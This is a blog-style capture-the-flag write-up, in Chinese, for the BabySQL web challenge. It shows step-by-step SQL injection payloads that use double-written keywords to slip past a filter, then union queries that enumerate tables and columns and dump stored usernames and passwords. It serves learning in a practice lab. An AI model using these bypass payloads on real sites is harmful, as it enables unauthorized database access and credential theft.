[极客大挑战 2019]BabySQL 1

[极客大挑战 2019]BabySQL 1

审题

还是SQL注入和之前的是一个系列的。

知识点

联合注入,双写绕过

解题

  1. 输入万能密码

    image-20240303195246322

发现回显中没有or,猜测是使用正则过滤了or。

image-20240303195314025

  1. 尝试双写绕过

image-20240303195525169

登录成功

image-20240303195548503

  1. 使用联合查询,本题中过滤了from,where,or ,by,union,select。

    image-20240303195737079

看到4没有注入点,2和3都有

image-20240303195814102

image-20240303200208066

image-20240303200221880

  1. 输入

    1'ununionion seselectlect 1,2,database()#

    爆出数据库

    image-20240303200429453

  2. 输入

    1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

    得到类名

    image-20240303201245845

  3. 输入

    1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

    得到表名

    image-20240303201453469

  4. 输入

    1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

    得到表的内容

image-20240303201713680

posted @   follycat  阅读(337)  评论(0编辑  收藏  举报
相关博文:
· [极客大挑战 2019]LoveSQL 1
· [极客大挑战 2019]EasySQL 1
· [BUUCTF][WEB][极客大挑战 2019]BabySQL 1
· [极客大挑战 2019]BabySQL
· [极客大挑战 2019]BabySQL 1
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示
AI IDE Trae